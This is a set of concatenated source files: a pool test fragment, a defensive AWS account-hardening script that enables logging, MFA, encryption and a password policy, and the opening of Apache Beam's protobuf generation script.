class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
setupaws.py
|
import random
import json
import time
import sys
import threading
from pathlib import Path
from PIL import Image
from botocore.exceptions import ClientError
from secureaws import common
def secure_account_menu(session):
"""
This will enable basic security services on your AWS account
"""
try:
while True:
print("\nSecure Account Menu:")
print("====================")
print("q: Quit")
print("?: Help")
print("*: Enable All")
print("1: Enable CloudTrail")
print("2: Enable Config")
print("3: Enable FlowLogs")
print("4: Enable Root MFA")
print("5: Enable S3 SSE")
print("6: Setup Password Policy")
print("7: Enable EBS SSE\n")
choice = str.lower(str.strip(input("Choice: ")))
if choice == "q":
break
elif choice == "?":
print("=============== HELP ===============")
print("- To set up individual service simply provide the number referring to the service and hit return key.")
print("- To set up multiple services simply provide comma(,) seperated numbers referring to the service and hit return key. Example: 2,5,1,3")
print("- To set up all services provide * and hit return key.")
elif choice == "*":
secure_account(session, non_interactive=False)
elif len(choice.split(",")) > 0:
choices = choice.split(",")
choices.sort()
for ch in choices:
if str(ch).strip() == "" or str(ch).isnumeric == False:
choices.remove(ch)
for ch in choices:
if ch == "1":
enable_cloudtrail(session, non_interactive=False)
elif ch == "2":
enable_config(session, non_interactive=False)
elif ch == "3":
enable_flowlogs(session, non_interactive=False)
elif ch == "4":
setup_virtual_mfa(session, non_interactive=False)
elif ch == "5":
enable_s3_sse(session, non_interactive=False)
elif ch == "6":
setup_custom_password_policy(session, non_interactive=False)
elif ch == "7":
enable_ebs_sse(session, non_interactive=False)
elif ch == "q" or ch == "?" or ch == "*":
continue
else:
print("Invalid Choice.")
elif choice == "1":
enable_cloudtrail(session, non_interactive=False)
elif choice == "2":
enable_config(session, non_interactive=False)
elif choice == "3":
enable_flowlogs(session, non_interactive=False)
elif choice == "4":
setup_virtual_mfa(session, non_interactive=False)
elif choice == "5":
enable_s3_sse(session, non_interactive=False)
elif choice == "6":
setup_custom_password_policy(session, non_interactive=False)
elif choice == "7":
enable_ebs_sse(session, non_interactive=False)
else:
print("Invalid choice.")
except ClientError as e:
print("Fail. Reason: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
def secure_account(session, svc=None, buckets=None, instance_id=None, volume_id=None, kms_id=None, non_interactive=False):
if svc == None or len(svc) == 0:
enable_cloudtrail(session, non_interactive)
enable_config(session, non_interactive)
enable_flowlogs(session, non_interactive)
setup_virtual_mfa(session, non_interactive)
enable_s3_sse(session, non_interactive, buckets, kms_id)
setup_custom_password_policy(session, non_interactive)
if not non_interactive:
enable_ebs_sse(session, non_interactive, instance_id, volume_id, kms_id)
else:
for s in svc:
if s == "cloudtrail":
enable_cloudtrail(session, non_interactive)
elif s == "config":
enable_config(session, non_interactive)
elif s == "flowlogs":
enable_flowlogs(session, non_interactive)
elif s == "mfa" or "mfa=" in s:
uname = "root" if "=" not in s else s.split("=")[1]
setup_virtual_mfa(session, non_interactive, uname)
elif s == "s3-sse":
enable_s3_sse(session, non_interactive, buckets, kms_id)
elif s == "ebs-sse":
if ((instance_id is None and volume_id is None) or (len(instance_id) == 0 and len(volume_id) == 0)) and non_interactive:
print("Either --instance-id or --volume-id is required for EBS enryption")
return False
enable_ebs_sse(session, non_interactive, instance_id, volume_id, kms_id)
elif s == "password-policy":
setup_custom_password_policy(session, non_interactive)
def enable_cloudtrail(session, non_interactive):
"""
This will create a new S3 bucket and enable CloudTrail service for all regions along with recording global events
"""
opt = ""
bname = ""
try:
print("\n====================================")
print("Setting up CloudTrail")
print("====================================")
if not non_interactive:
print("Following additional resource will be created:")
print("> S3 Bucket - To store audit logs")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
bname = "cloudtrail-all-regions-{}".format(common.random_string(5))
if opt == "y" or opt == "":
# Fetching Account ID for S3 Policy and Starting CloudTrail log
accountId = common.get_account_id()
bname = str.lower(str.strip(input("Bucket Name: "))) if bname == "" else bname
# Checking if bucket already exists
sys.stdout.write("Checking if bucket exists... ")
sys.stdout.flush()
s3 = session.client('s3')
if common.check_bucket_exists(bname):
print("True")
else:
print("False")
sys.stdout.write("Creating bucket... ")
sys.stdout.flush()
cbresp = common.create_s3_bucket(bname, session.region_name)
if cbresp == True:
print("Ok ({})".format(bname))
else:
print(cbresp)
return False
# Updating bucket policy
sys.stdout.write("Assigning permission to bucket... ")
sys.stdout.flush()
try:
bpolicy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AWSCloudTrailAclCheck",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "s3:GetBucketAcl",
"Resource": "arn:aws:s3:::{}".format(bname)
},
{
"Sid": "AWSCloudTrailWrite",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::{}/AWSLogs/{}/*".format(bname, accountId),
"Condition": {
"StringEquals": {
"s3:x-amz-acl": "bucket-owner-full-control"
}
}
}
]
}
time.sleep(1)
s3.put_bucket_policy(
Bucket=bname,
Policy=json.dumps(bpolicy)
)
print("Ok")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Setting up CloudTrail
try:
sys.stdout.write("Setting up CloudTrail... ")
sys.stdout.flush()
trail = session.client('cloudtrail')
trailName = "all-regions-trail-{}".format(common.random_string(5))
tresp = trail.create_trail(
Name=trailName,
S3BucketName=bname,
IncludeGlobalServiceEvents=True,
IsMultiRegionTrail=True,
EnableLogFileValidation=True
)
tresp = trail.start_logging(
Name="arn:aws:cloudtrail:{}:{}:trail/{}".format(session.region_name, accountId, trailName)
)
print("Ok ({})".format(trailName))
return True
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
else:
print("Skipping CloudTrail setup.")
return False
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_config(session, non_interactive):
"""
This will create a new S3 bucket and enable Config service for specific region
"""
opt = ""
bname = ""
try:
print("\n====================================")
print("Setting up Config")
print("====================================")
if not non_interactive:
print("Following additional resource will be created:")
print("> S3 Bucket - To store configuration snapshots")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
bname = "config-{}-{}".format(session.region_name, common.random_string(5))
if opt == "" or opt == "y":
# Fetching Account ID for S3 Policy and Starting CloudTrail log
accountId = common.get_account_id()
bname = str.lower(str.strip(input("Bucket Name: "))) if bname == "" else bname
# Checking if bucket exists
sys.stdout.write("Checking if bucket exists... ")
sys.stdout.flush()
s3 = session.client('s3')
if common.check_bucket_exists(bname):
print("True")
else:
print("False")
sys.stdout.write("Creating bucket... ")
sys.stdout.flush()
cbresp = common.create_s3_bucket(bname, session.region_name)
if cbresp == True:
print("Ok ({})".format(bname))
else:
print(cbresp)
return False
# Updating bucket policy
sys.stdout.write("Assigning permission to bucket... ")
sys.stdout.flush()
try:
bpolicy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AWSConfigBucketPermissionsCheck",
"Effect": "Allow",
"Principal": {
"Service": "config.amazonaws.com"
},
"Action": "s3:GetBucketAcl",
"Resource": "arn:aws:s3:::{}".format(bname)
},
{
"Sid": "AWSConfigBucketDelivery",
"Effect": "Allow",
"Principal": {
"Service": "config.amazonaws.com"
},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::{}/AWSLogs/{}/Config/*".format(bname, accountId),
"Condition": {
"StringEquals": {
"s3:x-amz-acl": "bucket-owner-full-control"
}
}
}
]
}
time.sleep(1)
s3.put_bucket_policy(
Bucket=bname,
Policy=json.dumps(bpolicy)
)
print("Ok")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Setting up Config
try:
sys.stdout.write("Setting up Config... ")
sys.stdout.flush()
config = session.client('config')
recorder_name = 'config-{}-recorder-{}'.format(session.region_name, common.random_string(5))
cresp = config.put_configuration_recorder(
ConfigurationRecorder={
'name': recorder_name,
'roleARN': "arn:aws:iam::{}:role/aws-service-role/config.amazonaws.com/AWSServiceRoleForConfig".format(accountId),
'recordingGroup': {
'allSupported': True,
'includeGlobalResourceTypes': True
}
}
)
cresp = config.put_delivery_channel(
DeliveryChannel={
'name': 'config-{}-channel-{}'.format(session.region_name, common.random_string(5)),
's3BucketName': bname
}
)
cresp = config.start_configuration_recorder(
ConfigurationRecorderName=recorder_name
)
print("Ok ({})".format(recorder_name))
return True
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
else:
print("Skipping cofig setup")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def add_config_rules(session, non_interactive): # COMING SOON...
"""
access-key-rotated
acm-certificate-expiration-check
alb-http-to-https-redirection-check
elb-loggin-enabled
cloud-trail-log-file-validation-enabled
cloudtrail-enabled
encrypted-volumes
root-account-mfa-enabled
vpc-flow-logs-enabled
s3-bucket-server-side-encryption-enabled
"""
try:
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_flowlogs(session, non_interactive):
"""
This will enable flow logs on all existing VPCs
"""
opt = ""
try:
print("\n====================================")
print("Setting up FlowLogs")
print("====================================")
if not non_interactive:
print("Following additional resources will be created:")
print("> IAM Role - Permission for VPC to put logs in CloudWatch")
print("> CloudWatch Log Group - To store VPC Flow Logs")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
# Creating IAM Role
sys.stdout.write("Creating IAM Role... ")
sys.stdout.flush()
iam = session.client('iam')
trust_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "vpc-flow-logs.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
roleName = "vpc-flow-logs-role-{}".format(common.random_string(5))
iresp = iam.create_role(
RoleName=roleName,
AssumeRolePolicyDocument=json.dumps(trust_policy)
)
role_arn = iresp['Role']['Arn']
permission_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:DescribeLogGroups",
"logs:DescribeLogStreams",
"logs:PutLogEvents"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
iresp = iam.create_policy(
PolicyName="vpc-flow-logs-policy-{}".format(common.random_string(5)),
PolicyDocument=json.dumps(permission_policy)
)
iam.attach_role_policy(
RoleName=roleName,
PolicyArn=iresp['Policy']['Arn']
)
print("Ok ({})".format(roleName))
# Setting up flow logs for all VPCs
ec2 = session.client('ec2')
vresp = ec2.describe_vpcs()
for vpc in vresp['Vpcs']:
vpc_id = vpc['VpcId']
vpc_name = common.get_name_tag(vpc['Tags']) if 'Tags' in vpc else None
if vpc_name == None:
vpc_name = vpc_id
log_group_name = "{}-flow-log-group-{}".format(vpc_name, common.random_string(5))
# Creating CloudWatch Log Group
sys.stdout.write("Creating CloudWatch Log Group... ")
sys.stdout.flush()
logs = session.client('logs')
logs.create_log_group(
logGroupName=log_group_name
)
lresp = logs.describe_log_groups(
logGroupNamePrefix=log_group_name,
limit=1
)
log_group_arn = lresp['logGroups'][0]['arn']
print("Ok ({})".format(log_group_name))
# Starting Flow Logs
sys.stdout.write("Starting Flow Logs... ")
sys.stdout.flush()
ec2 = session.client('ec2')
eresp = ec2.create_flow_logs(
DeliverLogsPermissionArn=role_arn,
LogGroupName=log_group_name,
ResourceIds=[
vpc_id,
],
ResourceType='VPC',
TrafficType='ALL',
LogDestinationType='cloud-watch-logs'
)
if len(eresp['Unsuccessful']) > 0:
print("Fail. Reason:" + eresp['Unsuccessful'][0]['Error']['Code'])
return False
print("Ok ({})".format(eresp['FlowLogIds'][0]))
return True
else:
print("Skipping flowlog setup")
return False
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def setup_virtual_mfa(session, non_interactive, username="root"):
"""
This will setup MFA on root account by default
"""
opt = ""
try:
print("\n====================================")
print("Setting up MFA")
print("====================================")
if not non_interactive:
uname = str.lower(str.strip(input("Username ({}): ".format(username))))
username = uname if not str.strip(uname) == "" else username
print("\nThis will enable MFA on {} user.".format(username))
opt = str.lower(str.strip(input("Do you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
if username != "root":
# Checking if user exists
iam = session.client('iam')
sys.stdout.write("Checking if user exists... ")
sys.stdout.flush()
try:
uresp = iam.get_user(
UserName=username
)
print("Ok")
except ClientError as err:
if err.response['Error']['Code'] == "NoSuchEntity":
print("False")
else:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Checking if MFA is already enabled for user
iam = session.client('iam')
sys.stdout.write("Checking if MFA already enabled... ")
sys.stdout.flush()
try:
uresp = iam.list_mfa_devices(
UserName=username
)
if len(uresp['MFADevices']) > 0:
print("True")
return False
print("False")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Creating virtual mfa device
sys.stdout.write("Creating virtual MFA device... ")
sys.stdout.flush()
rand_num = random.randint(1000, 9999)
mfa_name = username
user_path = "/" if username == "root" else "/user/" + username + "/"
mresp = iam.create_virtual_mfa_device(
Path=user_path,
VirtualMFADeviceName='{}-mfa-device-{}'.format(mfa_name, rand_num)
)
mfa_serial = mresp['VirtualMFADevice']['SerialNumber']
png_path = str(Path.home()) + "/{}-mfa-qr-{}.png".format(mfa_name, rand_num)
secret = ""
try:
secret = str(mresp['VirtualMFADevice']['Base32StringSeed'], 'utf-8')
with open(png_path, "wb") as f:
f.write(mresp['VirtualMFADevice']['QRCodePNG'])
img = Image.open(png_path)
img.show()
except IOError as ioerr:
return False
print("Ok")
print("==========================================")
print("Secret: " + secret)
print("==========================================")
print("Open Google Authenticator app on your mobile/tab and scan the QR code or use the secret displayed above to setup MFA for {} user.".format(mfa_name))
print("Please wait for the code to refresh after first input.")
for index in range(2): # Allowing 2 attempts
mfa1 = input("Auth Code 1: ")
mfa2 = input("Auth Code 2: ")
try:
maresp = iam.enable_mfa_device(
UserName=mfa_name,
SerialNumber=mfa_serial,
AuthenticationCode1=mfa1,
AuthenticationCode2=mfa2
)
break
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
if index == 1:
print("You have exhausted the limit. Please start the setup again.")
return False
print("This is your last try.\n")
print("Virtual MFA has been enabled for {} user.".format(mfa_name))
return True
else:
print("Skipping MFA setup")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_s3_sse(session, non_interactive, buckets=None, kms_id=None):
"""
This will enable server-side encryption on all your S3 buckets
"""
opt = ""
try:
if not non_interactive:
print("\n====================================")
print("Setting up S3 SSE")
print("====================================")
print("This will enable SSE on all S3 buckets.")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
s3 = session.client('s3')
if buckets == None or len(buckets) == 0:
resp = s3.list_buckets()
bucket_list = resp['Buckets']
else:
bucket_list = []
for b in list(buckets):
tmp = {
'Name': b
}
bucket_list.append(tmp)
for bucket in bucket_list:
bname = bucket['Name']
try:
sys.stdout.write("{}... ".format(bname))
sys.stdout.flush()
args = {
'Bucket': bname,
'ServerSideEncryptionConfiguration': {
'Rules': []
}
}
if kms_id == None or len(kms_id) == 0:
args['ServerSideEncryptionConfiguration']['Rules'].append({
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
})
else:
args['ServerSideEncryptionConfiguration']['Rules'].append({
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'aws:kms',
'KMSMasterKeyID': common.prepare_kms_key(session, kms_id)
}
})
r = s3.put_bucket_encryption(**args)
print("Enabled")
except ClientError as err:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
else:
print("Skipping SSE setup on S3 buckets")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def setup_custom_password_policy(session, non_interactive, pass_length=10, rq_num=True, rq_upper=True, rq_lower=True, rq_symbol=True, pass_history=3, pass_age=90):
"""
This will setup a strong password policy
"""
opt = ""
try:
print("\n====================================")
print("Setting up Password Policy")
print("====================================")
print("Following policy will be created:")
print("> Minimum Password Length: {}".format(pass_length))
print("> Require Numbers : {}".format(rq_num))
print("> Require Symbols : {}".format(rq_symbol))
print("> Require Uppercase : {}".format(rq_upper))
print("> Require Lowercase : {}".format(rq_lower))
print("> Password History : Last {}".format(pass_history))
print("> Password Age : {} days".format(pass_age))
if not non_interactive:
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
sys.stdout.write("Setting up password policy... ")
sys.stdout.flush()
iam = session.client('iam')
iresp = iam.update_account_password_policy(
MinimumPasswordLength=pass_length,
RequireSymbols=rq_symbol,
RequireNumbers=rq_num,
RequireUppercaseCharacters=rq_upper,
RequireLowercaseCharacters=rq_lower,
MaxPasswordAge=pass_age,
PasswordReusePrevention=pass_history
)
print("Ok")
else:
print("Skipping password policy setup")
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_ebs_sse(session, non_interactive, instance_ids=None, volume_ids=None, kms_id=None):
"""
This will enable server-side encryption on EBS volumes
"""
opt = ""
try:
print("\n====================================")
print("Encrypting EBS Volumes")
print("====================================")
print("!!!WARNING!!!\nThis results in downtime if volume is attached to an instance.")
if not non_interactive:
vm_ids = str.lower(str.strip(input("\nEnter instance id(s)(comma separated): ")))
vol_ids = str.lower(str.strip(input("Enter volume id(s)(comma separated): ")))
if len(vm_ids) < 10 and len(vol_ids) < 10:
print("Either instance id or volume id is required.")
return False
if len(vm_ids) > 10:
instance_ids = tuple(str(s).strip(", ") for s in vm_ids.strip(", ").split(","))
if len(vol_ids) > 10:
volume_ids = tuple(str(s).strip(", ") for s in vol_ids.strip(", ").split(","))
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
ec2 = session.client('ec2')
final_list = {}
params = {}
if instance_ids != None and len(instance_ids) > 0:
params['Filters'] = [
{
'Name': 'attachment.instance-id',
'Values': list(instance_ids)
}
]
while True:
resp = ec2.describe_volumes(**params)
for volume in resp['Volumes']:
unique = True
if volume['Attachments'][0]['InstanceId'] not in final_list:
final_list[volume['Attachments'][0]['InstanceId']] = []
else:
for vol in final_list[volume['Attachments'][0]['InstanceId']]:
if volume['VolumeId'] == vol['VolumeId']:
unique = False
break
if unique:
tmp = {
'VolumeId': volume['VolumeId'],
'Encrypted': volume['Encrypted'],
'MountPath': volume['Attachments'][0]['Device'],
'AZ': volume['AvailabilityZone'],
'VolumeType': volume['VolumeType']
}
if 'Iops' in volume:
tmp['Iops'] = volume['Iops']
if 'Tags' in volume:
tmp['Tags'] = volume['Tags']
final_list[volume['Attachments'][0]['InstanceId']].append(tmp)
try:
params['NextToken'] = resp['NextToken']
except:
break
params = {}
if volume_ids != None and len(volume_ids) > 0:
params['VolumeIds'] = list(volume_ids)
while True:
resp = ec2.describe_volumes(**params)
for volume in resp['Volumes']:
vm_id = 'null' if len(volume['Attachments']) == 0 else volume['Attachments'][0]['InstanceId']
unique = True
if vm_id not in final_list:
final_list[vm_id] = []
else:
for vol in final_list[vm_id]:
if volume['VolumeId'] == vol['VolumeId']:
unique = False
break
if unique:
tmp = {
'VolumeId': volume['VolumeId'],
'Encrypted': volume['Encrypted'],
'AZ': volume['AvailabilityZone'],
'VolumeType': volume['VolumeType']
}
if 'Iops' in volume:
tmp['Iops'] = volume['Iops']
if 'Tags' in volume:
tmp['Tags'] = volume['Tags']
if len(volume['Attachments']) != 0:
tmp['MountPath'] = volume['Attachments'][0]['Device']
final_list[vm_id].append(tmp)
try:
params['NextToken'] = resp['NextToken']
except:
break
manage_ebs_encryption(session, final_list, kms_id)
else:
print("Skipping EBS Volume Encryption")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def manage_ebs_encryption(session, volume_list, kms_id):
# print(volume_list)
for vmid in volume_list:
if vmid != "null":
print("Starting encryption process for volume(s) belonging to instance {}".format(vmid))
stop_instance(session, vmid)
threads = []
for vol in volume_list[vmid]:
t = threading.Thread(target=start_sse_process, args=(session,vmid,vol,kms_id,))
threads.append(t)
t.start()
for t in threads:
t.join()
if vmid != "null":
print("Volume(s) belonging to instance {} were successfully encrypted".format(vmid))
start_instance(session, vmid)
def start_sse_process(session, vmid, vol, kms_id):
if vol['Encrypted'] == True:
print("Volume {} is already encrypted. Skipping encryption process.".format(vol['VolumeId']))
return False
else:
print("Starting encryption of volume {}".format(vol['VolumeId']))
# Step 1: Create snapshot
old_snap_id = create_snapshot(session, vol['VolumeId'])
if old_snap_id == False:
print("Snapshot creation failed for volume {}".format(vol['VolumeId']))
return False
# Step 2: Clone snapshot with encryption
if kms_id == None or len(kms_id) == 0:
new_snap_id = clone_snapshot(session, old_snap_id)
else:
new_snap_id = clone_snapshot(session, old_snap_id, common.prepare_kms_key(session, kms_id))
if new_snap_id == False:
print("Snapshot encryption failed for snapshot {}".format(old_snap_id))
return False
# Step 3: Create new encrypted volume from cloned snapshot
if 'Tags' in vol:
new_vol_id = create_volume(session, new_snap_id, vol['AZ'], vol['VolumeType'], vol['Iops'], vol['Tags'])
else:
new_vol_id = create_volume(session, new_snap_id, vol['AZ'], vol['VolumeType'], vol['Iops'])
if new_vol_id == False:
print("Failed to create encrypted volume {}".format(new_vol_id))
return False
# Step 4: Attach encrypted volume to instance if applicable
if vmid != "null":
if not attach_to_vm(session, vol['VolumeId'], vmid, new_vol_id, vol['MountPath']):
print("Failed to attach encrypted volume {} to instance {}".format(new_vol_id, vmid))
return False
# Step 5: Clean unwanted resources
if not clean_resources(session, vol['VolumeId'], old_snap_id, new_snap_id):
print("Failed to delete resources: {} {} {}".format(old_snap_id, new_snap_id, vol['VolumeId']))
return False
return True
def stop_instance(session, vm_id):
try:
ec2 = session.client('ec2')
print("Stopping instance {}...".format(vm_id))
ec2.stop_instances(
InstanceIds=[
vm_id
]
)
total_time = 0
while True:
resp = ec2.describe_instances(
InstanceIds=[
vm_id
]
)
if resp['Reservations'][0]['Instances'][0]['State']['Name'] == 'stopped':
print("Successfuly stopped instance {}".format(vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still stopping instance {}... {}s'.format(vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def create_snapshot(session, vol_id):
try:
ec2 = session.client('ec2')
print("Creating snapshot of volume {}...".format(vol_id))
resp = ec2.create_snapshot(
VolumeId=vol_id,
Description='Unencrypted snapshot of {}'.format(vol_id)
)
snap_id = resp['SnapshotId']
total_time = 0
while True:
resp = ec2.describe_snapshots(
SnapshotIds=[
snap_id
]
)
if resp['Snapshots'][0]['State'] == 'completed':
print("Successfully created snaphost {} of volume {}".format(snap_id, vol_id))
return snap_id
time.sleep(5)
total_time = total_time + 5
print('Still creating snapshot {}... {}s'.format(snap_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def clone_snapshot(session, snap_id, kms_id="alias/aws/ebs"):
try:
ec2 = session.client('ec2')
print("Encrypting snapshot {}...".format(snap_id))
resp = ec2.copy_snapshot(
SourceSnapshotId=snap_id,
Description='Encryped snapshot of {}'.format(snap_id),
Encrypted=True,
KmsKeyId=kms_id,
SourceRegion=session.region_name
)
new_snap_id = resp['SnapshotId']
total_time = 0
while True:
resp = ec2.describe_snapshots(
SnapshotIds=[
new_snap_id
]
)
if resp['Snapshots'][0]['State'] == 'completed':
print("Successfully created encrypted snaphost {}".format(new_snap_id))
return new_snap_id
time.sleep(5)
total_time = total_time + 5
print('Still encrypting snapshot {}... {}s'.format(snap_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def create_volume(session, new_snap_id, az, vol_type, iops, tags=None):
try:
ec2 = session.client('ec2')
args = {
'AvailabilityZone': az,
'SnapshotId': new_snap_id,
'VolumeType': vol_type
}
if tags != None:
args['TagSpecifications'] = [
{
'ResourceType': 'volume',
'Tags': tags
}
]
if vol_type == 'io1':
args['Iops'] = iops
print("Creating encrypted volume from snapshot {}...".format(new_snap_id))
resp = ec2.create_volume(**args)
new_vol_id = resp['VolumeId']
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
new_vol_id
]
)
if resp['Volumes'][0]['State'] == 'available':
print("Successfully created encrypted volume {} from snapshot {}...".format(new_vol_id, new_snap_id))
return new_vol_id
time.sleep(5)
total_time = total_time + 5
print('Still creating new volume {}... {}s'.format(new_vol_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def attach_to_vm(session, old_vol_id, vm_id, new_vol_id, mount_path):
try:
ec2 = session.client('ec2')
# Detach old volume
print("Detaching old volume {} from instance {}...".format(old_vol_id, vm_id))
ec2.detach_volume(
VolumeId=old_vol_id,
Force=True
)
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
old_vol_id
]
)
if resp['Volumes'][0]['State'] == 'available':
print("Successfully detached old volume {} from instance {}".format(old_vol_id, vm_id))
break
time.sleep(5)
total_time = total_time + 5
print('Still detaching old volume {} from instance {}... {}s'.format(old_vol_id, vm_id, total_time))
# Attach new volume
print("Attching encrypted volume {} to instance {}...".format(new_vol_id, vm_id))
ec2.attach_volume(
InstanceId=vm_id,
VolumeId=new_vol_id,
Device=mount_path
)
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
new_vol_id
]
)
if resp['Volumes'][0]['State'] == 'in-use':
print("Successfully attched encrypted volume {} to instance {}".format(new_vol_id, vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still attaching encrypted volume {} to instance {}... {}s'.format(new_vol_id, vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def start_instance(session, vm_id):
try:
ec2 = session.client('ec2')
print('Starting back instance {}...'.format(vm_id))
ec2.start_instances(
InstanceIds=[
vm_id
]
)
total_time = 0
while True:
resp = ec2.describe_instances(
InstanceIds=[
vm_id
]
)
if resp['Reservations'][0]['Instances'][0]['State']['Name'] == 'running':
print('Successfully started instance {}'.format(vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still starting instance {}... {}s'.format(vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def clean_resources(session, old_vol_id, old_snap_id, new_snap_id):
try:
ec2 = session.client('ec2')
# Deleting old snapshot
ec2.delete_snapshot(
SnapshotId=old_snap_id
)
# Deleting new snapshot
ec2.delete_snapshot(
SnapshotId=new_snap_id
)
# Deleting old volume
ec2.delete_volume(
VolumeId=old_vol_id
)
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
from __future__ import print_function
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'interactive', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
MODEL_RESOURCES = [
os.path.normpath('../../model/fn-execution/src/main/resources'\
+ '/org/apache/beam/model/fnexecution/v1/standard_coders.yaml'),
]
def generate_proto_files(force=False, log=None):
try:
import grpc_tools # pylint: disable=unused-import
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
if log is None:
log = logging.getLogger(__name__)
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
